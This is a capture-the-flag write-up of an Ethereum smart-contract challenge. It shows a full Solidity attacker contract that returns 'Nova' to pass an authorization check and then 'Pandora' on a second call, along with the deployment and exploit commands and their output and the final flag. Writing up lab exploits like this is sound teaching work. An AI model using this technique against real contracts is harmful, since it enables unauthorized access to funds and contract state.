# The Art of Deception

Now to attempt the last of the blockchain challenges.

## The Challenge

### Setup.sol

![Source code for Setup.sol](./1-setup-sol-source.png)

### FortifiedPerimeter.sol

![Source code for FortifiedPerimeter.sol](./2-forified-perimeter-sol-source.png)

## Investigation

New in this one is msg.sender which names the entrant. I looked this up a bit and found [this](https://stackoverflow.com/a/72378815) StackOverflow answer by [Prince Dholakiya](https://stackoverflow.com/users/7832102/prince-dholakiya) that suggests msg.sender can be different depending on whether it came from a Person or another Contract. This makes me wonder if we need to write and deploy our own Smart Contract to perform this deception.

<details><summary>Click to Expand StackOverflow Answer</summary>
Let's make it very simple.

```
There are two types of accounts in the Ethereum Chain
1). Externally Owned Accounts(EOA) [Person]
2). Contracts Accounts [Contracts on Chain]
```

Both accounts have their addresses.

   * Now, look at an example.

Wallet address of personA (EOA) is `0x0cE446987406E92DF41614C46F1d6df9Cc925847`.

Contract Address of `Math.sol` is `0x0cE446987406E92DF41614C46F1d6df9Cc753869` and `Math.sol` contains `ContractA`

Contract Address of `Addition.sol` is `0x0cE446987406E92DF41614C46F1d6df9Cc357241` and `Addition.sol` contains `ContractB`

Here, one of the functions of `ContractB` is called from `ContractA`.

So, whenever `personA` calls any functions of `ContractA`.

```
In this scenario, if you print or get `msg.sender` and `tx.origin` inside function of `ContractB` then the result would be like this

msg.sender = `0x0cE446987406E92DF41614C46F1d6df9Cc753869` // You will get address of `ContractA`
tx.origin  = `0x0cE446987406E92DF41614C46F1d6df9Cc925847` // personA's (EOA) Wallet Address
```
</details>

## Solution

My guess is the `enter()` function is vulnerable by relying on the sender to return the same value each time the `name()` function is called. An attacker can use a boolean and return a different value if the function has been called more than once:

```solidity
    function enter() external {
        Entrant _entrant = Entrant(msg.sender);

        require(_isAuthorized(_entrant.name()), "Intruder detected");
        lastEntrant = _entrant.name();
    }
```

The first time name() is called we can return "Orion", "Nova" or "Eclipse" then we will want to return "Pandora" to complete the challenge.

First I initialized a new project for the forge program:
```
$ forge init foundry
Initializing /home/kali/cyberapocalypse2023/blockchain/the_art_of_deception/blockchain_the_art_of_deception/foundry...
Installing forge-std in "/home/kali/cyberapocalypse2023/blockchain/the_art_of_deception/blockchain_the_art_of_deception/foundry/lib/forge-std" (url: Some("https://github.com/foundry-rs/forge-std"), tag: None)
    Installed forge-std v1.5.2
    Initialized forge project.
```

Then I moved `Setup.sol` and `FortifiedPerimeter.sol` to the `foundry/src` folder.

### MyContract.sol

I then created `MyContract.sol` containing:

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.18;

import {HighSecurityGate} from "./FortifiedPerimeter.sol";

contract MyContract {
    bool hasBeenCalled;
    HighSecurityGate public immutable TARGET;

    constructor()
    {
        // Not trying to be perfect so we will hardcode the target address in our contract
        TARGET = HighSecurityGate(0x54A5A08674a94FaFfb70f09D20A1FEaaE68278CE);
        hasBeenCalled = false;
    }

    function name() public returns (string memory) {
        if(!hasBeenCalled){
            hasBeenCalled = true;
            return "Nova";
        }

        return "Pandora";
    }

    function callTarget() public {
        TARGET.enter();
    }
}
```

## Deploying MyContract.sol

Now I build and deploy the contract:
```
$ forge build
[⠊] Compiling...
[⠢] Installing solc version 0.8.19
[⠰] Successfully installed solc 0.8.19
[⠢] Compiling 22 files with 0.8.19
[⠔] Solc 0.8.19 finished in 1.76s
Compiler run successful

forge create --rpc-url http://165.22.116.7:30835 --private-key $PRIVATE_KEY src/MyContract.sol:MyContract     
[⠔] Compiling...
No files changed, compilation skipped
Deployer: 0x97B89849f7562F0Ea82b132fD4b8ccF20244640E
Deployed to: 0xe6021d1c40976C34b989F61e8c05d7962b50DBAB
Transaction hash: 0x507c1b0185500e170b9a32322f422e9381aeeb070b68edfa0729badcbfb993d2
```

## Exploiting FortifiedPerimeter.sol

With my contract deployed I can have it call the target contract for me and perform the attack:
```
$ export MY_CONTRACT=0xe6021d1c40976C34b989F61e8c05d7962b50DBAB
cast send $MY_CONTRACT "callTarget()" --rpc-url http://165.22.116.7:30835/ --private-key $PRIVATE_KEY     

blockHash               0xf82a33c9f6eff8adf1bad792ae64e31bdf1069a6b14678c7a2493192aac477e4
blockNumber             13
contractAddress         
cumulativeGasUsed       61498
effectiveGasPrice       3000000000
gasUsed                 61498
logs                    []
logsBloom               0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
root                    
status                  1
transactionHash         0x0d224d7b7661ba9e93ebdd744da84616ab28bc731d8b94fbb3bb802571eeceb5
transactionIndex        0
type                    2
```

## Verification

Now to verify the target contract's lastEntrant was Pandora:
```
$ cast call $TARGET_CONTRACT "lastEntrant()" --rpc-url http://165.22.116.7:30835/ --private-key $PRIVATE_KEY
0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000750616e646f726100000000000000000000000000000000000000000000000000
```

I used CyberChef to verify the data returned was correct

![Decode base64 with CyberChef](./3-cyberchef-decode.png)

## Retrieve Flag

Then I used the TCP connection using netcat to obtain the flag.

![Retrieving flag from TCP connection](./4-retrieve-flag.png)

## Flag

`HTB{H1D1n9_1n_PL41n_519H7}`